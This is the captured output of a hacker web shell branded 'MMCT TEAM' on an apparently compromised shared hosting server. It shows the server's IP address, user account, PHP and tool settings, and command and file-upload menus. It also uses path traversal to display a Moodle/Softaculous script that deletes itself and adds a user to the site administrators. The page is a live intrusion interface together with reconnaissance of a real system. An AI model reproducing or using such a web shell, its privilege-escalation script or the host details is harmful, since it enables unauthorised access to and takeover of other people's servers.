MMCT TEAM
Server IP : 103.53.40.154  /  Your IP : 18.216.145.37
Web Server : Apache
System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : ppcad7no ( 715)
PHP Version : 8.2.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /var/softaculous/ocportal/../oscom/../wonder/../abante/../conc85/../moodle38/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : //var/softaculous/ocportal/../oscom/../wonder/../abante/../conc85/../moodle38/add_admin.php
<?php

@unlink(__FILE__);

//Validate if the request is from Softaculous
if($_REQUEST['pass'] != '[[autopass]]'){
    die("Unauthorized Access");
}

require_once('config.php');
require_once('lib/adminlib.php');

$user_id = (int) '[[user_id]]';

$admins = array();
foreach (explode(',', $CFG->siteadmins) as $admin) {
    $admin = (int)$admin;
    if ($admin) {
        $admins[$admin] = $admin;
    }
}

$logstringold = implode(', ', $admins);

$admins[$user_id] = $user_id;

$logstringnew = implode(', ', $admins);

set_config('siteadmins', implode(',', $admins));
add_to_config_log('siteadmins', $logstringold, $logstringnew, 'core');

$ret = array();
$ret['done'] = 1;

echo '<add_admin>'.serialize($ret).'</add_admin>';

exit(0);

MMCT - 2023